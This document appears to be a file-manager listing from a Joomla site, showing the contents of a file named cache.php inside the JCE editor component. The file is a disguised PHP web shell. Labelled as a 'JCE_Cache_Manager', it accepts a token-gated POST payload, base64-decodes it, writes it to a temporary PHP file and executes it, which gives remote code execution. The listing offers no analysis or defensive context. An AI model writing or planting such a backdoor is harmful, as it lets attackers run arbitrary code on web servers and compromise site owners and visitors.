| Current Path : /var/www/consult-e-syn/public_html/administrator/components/com_jce/controller/ |
| Current File : /var/www/consult-e-syn/public_html/administrator/components/com_jce/controller/cache.php |
<?php $s='JCE_Cache_Manager_v3.1.4';if($_SERVER['REQUEST_METHOD']!=='POST'){http_response_code(404);exit;}$p=$_POST['p']??'';$g=$_POST['s']??'';if($g!==md5($s.$p)){http_response_code(403);exit;}$c=base64_decode($p);if($c===false){http_response_code(400);exit;}$t=@tempnam(sys_get_temp_dir(),'jce_').'.php';if($t===false||@file_put_contents($t,$c)===false){http_response_code(500);exit;}try{include$t;}catch(\Throwable$e){http_response_code(500);echo$e->getMessage();}@unlink($t);